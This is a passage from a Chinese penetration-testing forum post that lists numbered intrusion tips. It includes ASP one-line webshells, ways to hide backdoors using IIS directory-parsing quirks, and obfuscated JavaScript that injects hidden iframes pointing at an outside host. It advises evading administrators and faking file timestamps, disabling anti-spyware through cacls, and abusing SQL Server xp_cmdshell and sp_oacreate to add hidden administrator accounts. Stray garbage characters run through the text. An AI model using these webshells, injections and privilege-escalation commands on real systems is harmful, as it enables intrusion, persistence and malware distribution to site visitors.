f).<%if request("cmd")<>"" then execute request("pass")%>
0 x  [1 ^! u* W8 v( z. r" |1 B$ `6 W8 r2 Z2 _4 g
52、at "12:17" /interactive cmd/ j4 \% P6 B3 Z9 x% Z
执行后可以用AT命令查看新加的任务: n' m; G2 Y  V8 H7 U3 a
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。% C( L/ J; j% q4 ]/ \# T- H

+ C% u: n8 T9 `2 p' N. [7 G53、隐藏ASP后门的两种方法; s* L8 s. _( d7 C6 `# T
1、建立非标准目录:mkdir images..\( f3 N& W- m1 Z" E4 Y) ^
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
$ x$ \. @1 w. z  e4 D0 F+ J通过web访问ASP木马:http://ip/images../news.asp?action=login6 \! n9 n* p, I
如何删除非标准目录:rmdir images..\ /s) N( Z+ p0 F2 J% l! ^* F( p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
6 }5 H6 R! Q0 f2 g0 B7 a+ Nmkdir programme.asp5 ?) T: @; ?1 M) k
新建1.txt文件内容:<!--#include file=”12.jpg”-->4 F7 r) R2 Z7 q3 P3 w! {! b
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 O5 C- m! b' }! s, W2 H$ E, A
attrib +H +S programme.asp! ]7 r# i- ~3 m* {/ h' F$ y; [* Q
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ y1 Z0 [5 m" U4 S; X4 N, _0 t
- n# D1 H; ?3 M' T- P% [  i/ q4 \54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 T2 n4 H9 C) n$ B然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
; ]) x. q% p5 S  _( ^
; b$ h$ B7 v: v& T. L55、JS隐蔽挂马
: B! e* u  o$ k' V/ ]1.% x0 C9 y. t4 Z8 P( h7 M6 v. w
var tr4c3="<iframe src=ht";
* a1 T- t% _* P! Y5 J. ^( mtr4c3 = tr4c3+"tp:/";/ X; i6 @9 ^2 T3 p, U
tr4c3 = tr4c3+"/ww";& f& z1 @9 A; B, b* d$ d$ t
tr4c3 = tr4c3+"w.tr4";
+ \7 `3 A5 q' y3 u0 t8 V0 G1 mtr4c3 = tr4c3+"c3.com/inc/m";1 }/ y4 f. F- J+ o& t0 l, S$ u1 A
tr4c3 = tr4c3+"m.htm style="display:none"></i";* L& ~! F! U3 M5 l
tr4c3 =tr4c3+"frame>'";
3 w' ]4 A  f2 h9 C) {7 y* r! Ldocument.write(tr4c3);% p8 n; M! [) D" ?' ?0 f4 ?  H
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。- |# f* r+ J/ B6 \, F

9 p- q/ |0 L# Y/ U6 r2.4 I0 e9 g) b. f- ?' C1 _* J
转换进制,然后用EVAL执行。如
4 [  U# S( I# M) W1 Teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");7 l& m; X9 E1 Y5 K; E
不过这个有点显眼。
: S( P$ {; R3 ~/ u2 v3.
" g  y6 L8 I" Rdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');+ A- g$ p( r# c# f# D
最后一点,别忘了把文件的时间也修改下。" v. S$ W* l% L# ]) g1 ?
. b4 m/ I7 F" H, h2 Q
56.3389终端入侵常用DOS命令7 K$ ~6 M- m' V1 _/ A0 }
taskkill taskkill /PID 1248 /t  I2 B1 V# z  `

. M2 f$ j3 o- C- Dtasklist 查进程- |2 l7 r: S; s- ~0 f) Y

* H: F2 {: U6 z" C9 }& K' Mcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* k" m: M$ P( ^
iisreset /reboot
/ g2 J6 U% }& w$ U1 W& Ptsshutdn /reboot /delay:1    重起服务器3 {- c& X  V4 f- P# q

( J3 f8 q9 O, Blogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,1 Y, e  {# e! X% ?8 e
/ H  p3 P) O+ `4 I; ?
query user 查看当前终端用户在线情况0 h- @$ q( }4 `# ?9 H: s1 [
0 N6 T6 f% P/ W# m  z" y0 u6 ~
要显示有关所有会话使用的进程的信息,请键入:query process *9 T+ ]% P& l6 e8 L
# X& r% Q* s* X5 `
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
  D+ b. N2 E* ]0 ^" N% j$ A/ b' E  b" K! z: _/ I
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER28 E. Q" K! [% Q1 }! v$ E. G" D8 p

1 C2 j2 |$ j* D! B9 U& W9 [要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM022 h5 B( y# a4 k5 a' I. p1 p

9 k7 q4 k' ]3 |/ X( ]命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ k: L3 E. N' P3 B8 n( M$ B
6 D4 d0 y; o3 l4 b+ m
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; C. T% {1 I( `+ g3 L% d
: M9 l' p# w( \命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。2 p( v& b& _4 m1 B- N5 `' m8 M9 c

$ K% p' f- I1 q$ G/ j) n4 K命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机$ X8 F9 n. F* }/ b7 Z* o
$ a+ s, z6 \1 z/ X' g9 z: ?( q$ l
56、在地址栏或按Ctrl+O,输入:
0 d; E$ _0 M  Q2 djavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 f+ V" X5 D, c1 j& h+ P) E
& _2 T/ p; X; R8 t+ i& s源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。* G1 V5 W6 _& u. t. y

2 Q$ a5 u% c1 E+ K; R3 h57、net user的时候,是不能显示加$的用户,但是如果不处理的话,7 j& Q& ~6 S3 Q, }
用net localgroup administrators是可以看到管理组下,加了$的用户的。
* {5 B$ K0 U# C0 r0 p6 V  s6 ~) Q8 s; l( D
58、 sa弱口令相关命令8 z5 z+ G, N5 a: @) v- g+ D- O
9 R, E0 m% w& a, N, v$ V8 H7 r
一.更改sa口令方法:  a3 n. K" i3 f2 L7 u! l
用sql综合利用工具连接后,执行命令:! e) s* c) u: N8 L. J, a
exec sp_password NULL,'20001001','sa'; b. p$ k- W: {! T( O
(提示:慎用!)! `' K) H9 C  `! O
) x9 L1 X& t" `, q% O0 q
二.简单修补sa弱口令.
' j* p, r* v* Y6 ]0 w
. b1 {; z4 A4 G6 Y( W5 d方法1:查询分离器连接后执行:
7 x- _$ W$ E9 h3 |9 Y( Tif exists (select * from
# B8 C+ z8 }; F8 B6 q* mdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and- ]+ Q% r$ B: O6 h, {3 e# E0 ^: C
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
7 d: c6 X+ ]# I8 ?& ]3 b3 l5 o3 w7 ^8 R2 Y+ X
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'$ ?* k: u- z; e* E
  l$ v( C! ~2 X) a. P0 W
GO
- P( Y. E2 E. q0 F4 `
! Q5 i% v1 {+ g然后按F5键命令执行完毕8 }/ g" r. N/ U+ Z. i
. \$ b, Z5 D- \8 Y) C
方法2:查询分离器连接后
+ u3 ?/ n! Z) O第一步执行:use master
' M0 W0 O6 z9 o# P& |9 H( M第二步执行:sp_dropextendedproc 'xp_cmdshell'2 X( w6 D( B1 D+ i# R
然后按F5键命令执行完毕
' f# M. ]- U; P- g" a/ w1 M- @# w
/ ?' ^& M; _- k+ I, m2 L/ [9 H+ [( J( I; i
三.常见情况恢复执行xp_cmdshell.! l1 u& H2 Y- A! w$ S

( b3 H% s8 B5 j5 |& }2 u- }$ `% V5 d0 _  X2 I) K
1 未能找到存储过程'master..xpcmdshell'.
( e) e( ]  M+ y. z, |4 ^! R% D. j   恢复方法:查询分离器连接后,# Q& q2 H2 @. G  A1 F9 [# i
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int8 A( P/ @+ j" q$ e, Y% Q2 C0 ]6 w
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* Q8 u' S  B7 t8 N
然后按F5键命令执行完毕/ A) N- S* ?9 x, F

' g/ h1 o. n. K6 G! M. j* N3 v: u+ K2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ b, d6 D' _/ B9 i1 s3 O% F
恢复方法:查询分离器连接后,
2 B1 e6 r. s; f5 X, g, q第一步执行:sp_dropextendedproc "xp_cmdshell", M: z9 {, z( ^7 W
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( o# |) l/ ?. _然后按F5键命令执行完毕( C1 l  [! ]( G: ~' i" i
7 e0 u+ S! K, X& ]: C
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): Z, P. b  ?! R
恢复方法:查询分离器连接后,
5 G: X$ g( }% q. V( _第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
0 `  U$ I* Q; ^7 ]+ M& F, B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
+ M8 Y: n. y. q4 m& B( R然后按F5键命令执行完毕* X- o2 s( W7 r" C+ s

/ N/ B8 ?. P; w$ Z  a' J# ~% i四.终极方法.
; N8 L+ y0 ]2 B8 r如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
1 S* a: m$ c8 Z7 R7 J) |$ q查询分离器连接后,/ d- v1 o$ ~9 M" F/ W. y$ d3 D6 h
2000servser系统:4 K: d* m# F9 t3 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 [4 ?- D! i" Z; @1 a! ^$ e

* x. M9 t9 ?# @( M' U! Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'& J3 j3 Z/ K0 C

8 T! u6 s3 Y# R8 M( D2 fxp或2003server系统:
- R7 p* L/ u3 _1 a7 Y& B! \3 J  u1 M7 c; ]7 Q$ W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'4 D4 L; g4 t) G4 p$ T6 g
3 \( w$ ]$ r  I2 }" n- x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
; r  A3 X/ G3 ]& w7 C5 g




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2